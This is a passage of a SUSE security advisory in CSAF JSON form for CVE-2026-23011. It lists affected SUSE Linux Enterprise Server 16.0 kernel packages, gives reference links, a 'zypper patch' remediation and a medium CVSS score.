"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
